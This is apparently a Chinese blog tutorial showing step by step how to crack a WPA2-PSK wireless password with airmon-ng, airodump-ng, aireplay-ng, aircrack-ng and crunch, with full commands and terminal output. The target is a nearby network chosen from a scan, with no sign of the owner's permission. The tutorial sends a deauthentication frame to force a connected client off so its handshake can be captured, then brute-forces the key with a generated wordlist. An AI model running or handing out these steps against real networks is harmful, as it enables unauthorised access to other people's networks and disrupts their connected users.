写于:2014-09-14		最近一次更新:2016-06-18

Intent:

破解WPA2-PSK加密的无线网络

Oneway:

如今的无线路由器都默认使用WPA2-PSK加密无线信号, 到目前为止,尚无关于短时间内破解WPA2-PSK密码的方法, 只能采用先捕获 WPA handshake 然后再暴力破解的方式 (由于WPS功能的出现,曾经可以通过类似reaver的软件在较短时间内破解pin码, 从而获得WPA2-PSK的密码,但现在的路由器已经修补了这个漏洞, reaver破解变得比暴力破解都费时费力)

Details:

将无线网卡设置为监听模式(即混杂模式),以便于捕获WPA handshake root@diagmap:~# airmon-ng start wlan0 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 811 NetworkManager 1128 wpa_supplicant 1144 dhcpcd Process with PID 1144 (dhcpcd) is running on interface wlan0 Interface Chipset Driver wlan0 Atheros AR9285 ath9k - [phy0] (monitor mode enabled on mon0) 出现提示monitor mode enabled on mon0表示成功设置网卡为监听模式 查看待破解目标 root@diagmap:~# airodump-ng -a mon0 CH -1 ][ Elapsed: 1 min ][ 2014-09-24 13:41 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 82:17:7B:9C:B8:F5 -47 505 0 0 11 54e WPA2 CCMP MGT love CC:34:29:39:22:30 -55 752 3084 37 11 54e. WPA2 CCMP PSK WGW 9C:B7:0D:E7:ED:8D -66 271 0 0 10 54e. WPA2 CCMP PSK dsq F4:EC:38:64:69:5E -54 1 0 0 1 54e. WPA2 CCMP PSK mnxnm BSSID STATION PWR Rate Lost Frames Probe 00:17:7B:9C:BD:27 E0:91:53:85:D2:C0 -87 0 - 1 0 87 F4:EC:38:64:69:5E F8:A4:5F:70:5F:2A -76 0 - 1 0 4 选定目标 PWR项的值一般在-50~-90之间,-50的信号比-90强 ESSID为mnxnm的无线网络当前有客户端F8:A4:5F:70:5F:2A连接 选定mnxnm为破解目标 下面针对mnxnm进行数据包捕获 root@diagmap:~# airodump-ng --bssid F4:EC:38:64:69:5E --write /home/sman/Desktop/zhuaBao --ivs mon0 CH -1 ][ Elapsed: 12 s ][ 2014-09-24 13:58 ] BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID BSSID STATION PWR Rate Lost Frames Probe 等待...... CH -1 ][ Elapsed: 1 min ][ 2014-09-24 14:03 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F4:EC:38:64:69:5E -39 1 0 0 1 54e. WPA2 CCMP PSK mnxnm BSSID STATION PWR Rate Lost Frames Probe 捕捉到有连接mnxnm的客户端 CH -1 ][ Elapsed: 6 mins ][ 2014-09-24 14:08 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F4:EC:38:64:69:5E -42 3 0 0 1 54e. WPA2 CCMP PSK mnxnm BSSID STATION PWR Rate Lost Frames Probe F4:EC:38:64:69:5E F8:A4:5F:70:5F:2A -39 0 - 1 0 1 如果长时间捕获不到WPA handshake,则再开启一个命令终端, 使用以下命令强制断开当前用户与路由器的连接,以便更快捕获WPA handshake 注意,这条命令执行一两次就好,不要频繁执行,否则会导致路由器重启 root@diagmap:~# aireplay-ng -a F4:EC:38:64:69:5E -c F8:A4:5F:70:5F:2A --deauth 1 --ignore-negative-one mon0 捕获到WPA handshake CH -1 ][ Elapsed: 6 mins ][ 2014-09-24 14:08 ][ WPA handshake: F4:EC:38:64:69:5E ] BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID F4:EC:38:64:69:5E -42 3 0 0 1 54e. WPA2 CCMP PSK mnxnm BSSID STATION PWR Rate Lost Frames Probe F4:EC:38:64:69:5E F8:A4:5F:70:5F:2A -39 0 - 1 0 1 开始暴力破解 这个过程根据机器的配置是否强悍,需要几天甚至更多时间 使用现成的密码字典wordlist.txt,密码字典可以是自己从网上下载的,或者自己用工具生成的 aircrack-ng /home/sman/Desktop/zhuaBao-01.ivs -w /home/sman/Desktop/wordlist.txt 由于大部分字典都很大100G,1000G,甚至10T,或者更大,一般人的硬盘不够用 所以可以采用边生成字典边破解的方式,这里字典生成工具为crunch,具体命令为 crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 |\ aircrack-ng -a 2 -b F4:EC:38:64:69:5E -w - /home/sman/Desktop/zhuaBao-01.ivs 如果中途需要中断破解,过后继续破解过程,可以使用crunch的-s参数 指定从中断的密码处继续下去,如从密码“a92x1h41”处继续生成字典用于破解 crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 -s a92x1h41 |\ aircrack-ng -a 2 -b F4:EC:38:64:69:5E -w - /home/sman/Desktop/zhuaBao-01.ivs 一般人配置的wpa密码都是8位的,且为小写字母加数字的组合居多,暴力破解出来的概率是很大的 直到出现 KEY FOUND 字样时,表示破解成功